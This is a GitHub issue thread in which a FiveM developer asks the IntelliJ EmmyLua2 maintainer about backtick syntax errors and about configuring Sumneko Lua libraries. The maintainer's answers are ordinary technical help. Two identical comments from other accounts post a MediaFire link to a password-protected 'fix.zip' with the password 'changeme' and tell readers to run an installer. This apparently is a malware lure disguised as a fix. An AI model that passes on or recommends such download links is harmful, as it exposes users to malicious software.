### ISSUE TITLE
Question: Anyway to disable Backticks Errors.

### ISSUE THREAD

**Issue by vipexv** [EmmyLua/Intellij-EmmyLua2#2]
So i know this isn't relatively meant for FiveM but i'm using it for that, and in FiveM we use backticks (`)
instead of quotation (") when we input a model or anything relative to that because it automatically changes them to the actual hashes of the models at runtime.

Anyway i can get support for this or atleast disable the errors?

Also if i were to use SumnekoLua, how can i add another library such as the FiveM one so i can access the functions from that one, because as of currently i'm just adding the `.emmyrc.json` file and adding the library in there, how can i do that for SumnekoLua?

![image](https://github.com/user-attachments/assets/d4a25e0a-c7cf-42ff-afd0-6494dae5ab54)

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CppCXY** [comment]
> So i know this isn't relatively meant for FiveM but i'm using it for that, and in FiveM we use backticks (`) instead of quotation (") when we input a model or anything relative to that because it automatically changes them to the actual hashes of the models at runtime.
> 
> Anyway i can get support for this or atleast disable the errors?
> 
> Also if i were to use SumnekoLua, how can i add another library such as the FiveM one so i can access the functions from that one, because as of currently i'm just adding the file and adding the library in there, how can i do that for SumnekoLua?`.emmyrc.json`
> 


You cannot support this syntax without modifying the source code. Additionally, EmmyLua does not allow suppressing syntax errors alone. However, you can add `---@meta` in the current file to disable all diagnostics for this file.

**Comment by CppCXY** [comment]
The same configuration, but the name is `.luarc.json`

**Comment by vipexv** [comment]
Ty!

**Comment by vipexv** [comment]
Sorry for bugging you again but any idea why it's throwing this again, in VSCode using Sumneko Lua it doesn't throw this error.

**Comment by CppCXY** [comment]
Because IntelliJ's Sumneko Lua uses IntelliJ-EmmyLua's PSI as the frontend.

**Comment by vipexv** [comment]
So is there legitimately no way to actually make it support backticks, anyway to change it to a warning?

**Comment by CppCXY** [comment]
I think someone should specifically create a plugin for FiveM, rather than continuing to bypass the plugin checks.

**Comment by CppCXY** [comment]
Isn't there anyone in the FiveM community making plugins?

**Comment by vipexv** [comment]
Not really, i doubt anyone actually uses IntelliJ for FiveM, there's a couple of people making plugins for VSCode but i genuinely do not want to  use VSCode anymore.

**Comment by vipexv** [comment]
I've been trying Zed and it worked well with LUA and adding  libraries, but it's not fully supported on windows and it has allot of bugs with other languages that need to be fixed.

**Comment by CppCXY** [comment]
Let me give you a tip: disable the sumnekolua plugin and use only the LSP4IJ plugin's functionality. Configure it to point to the sumneko lua executable path. This way, you won't have frontend syntax errors anymore.

**Comment by vipexv** [comment]
I'll look into it, i appreciate you once again and i hope you have a good day/night!
